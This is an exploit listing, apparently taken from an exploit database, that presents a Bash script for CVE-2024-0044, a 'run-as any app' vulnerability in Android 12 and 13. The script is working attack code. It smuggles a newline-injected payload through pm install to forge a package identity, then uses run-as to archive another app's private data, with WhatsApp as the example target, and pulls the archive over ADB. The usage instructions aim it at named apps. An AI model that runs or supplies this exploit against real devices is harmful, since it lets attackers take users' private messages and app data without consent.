Share
## https://sploitus.com/exploit?id=25843004-BF4D-57C9-BE84-7DA8C32E1E72
# CVE-2024-0044-
CVE-2024-0044: a "run-as any app" high-severity vulnerability affecting Android versions 12 and 13

# CVE-2024-0044 Exploit Script

This Bash script demonstrates how to exploit CVE-2024-0044. **For educational and testing purposes only.**

## Prerequisites
- ADB (Android Debug Bridge) installed and configured
- A connected Android device with USB debugging enabled

## Script Code
```bash
#!/bin/bash

# Function to exploit CVE-2024-0044
exploit_cve_2024_0044() {
    local url=$1
    local package_name=$2
    local apk_path=$3

    # Generate payload
    local payload="PAYLOAD=\"@null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null\"
pm install -i \"\$PAYLOAD\" /data/local/tmp/$(basename $apk_path)"

    # Push APK to device
    adb push "$apk_path" /data/local/tmp/

    # Execute payload
    adb shell <<< "$payload"

    # Create temporary directory
    adb shell "mkdir /data/local/tmp/wa/"
    adb shell "touch /data/local/tmp/wa/wa.tar"
    adb shell "chmod -R 0777 /data/local/tmp/wa/"

    # Archive target application's data
    adb shell "run-as victim tar -cf /data/local/tmp/wa/wa.tar $package_name"

    # Pull data
    adb pull "/data/local/tmp/wa/wa.tar" "wa_data.tar"
}

# Usage
if [[ $# -ne 3 ]]; then
    echo "Usage: $0 <url> <package_name> <apk_path>"
    echo "Example: $0 https://web.whatsapp.com/ com.whatsapp /path/to/apk.apk"
    exit 1
fi

exploit_cve_2024_0044 "$1" "$2" "$3"
```
## commands
```bash
chmod +x exploit_cve_2024_0044.sh
./exploit_cve_2024_0044.sh <url> <package_name> <apk_path>
```

### Parameters
- Replace `https://web.whatsapp.com/` with the actual target URL.
- Replace `com.whatsapp` with the target package name.
- Replace `/path/to/apk.apk` with the path to the APK file.